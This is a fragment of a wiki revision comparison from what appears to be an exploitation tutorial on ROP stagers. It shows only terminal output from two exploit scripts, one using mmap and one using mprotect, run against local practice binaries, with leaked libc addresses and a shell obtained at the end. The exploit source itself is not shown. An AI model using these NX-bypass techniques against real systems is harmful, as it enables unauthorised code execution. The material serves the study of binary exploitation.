Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
titlepython rop.py
lazenca0x0@ubuntu:~/Exploit/ROPStager/mmap$ python ropmmap.py 
[*] '/lib32/libc-2.23.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/lazenca0x0/Exploit/ROPStager/mmap/rop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process '/home/lazenca0x0/Exploit/ROPStager/mmap/rop': pid 43618
[*] Libc base : 0xf75f5000
[*] mmap addr : 0xf76d6060
[*] memcpy addr : 0xf766b860
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$  

...

Code Block
titlepython rop.py
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ python ropmprotect.py
[*] '/lib/x86_64-linux-gnu/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './rop64': pid 43561
[*] 0x7ffd0e0a4
[*] 0x7ffd0e0a4000
[*] libcbase : 0x7fe88a73e000
[*] stack : 0x7ffd0e0a4470
[*] mprotect() : 0x7fe88a83f770
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ 

...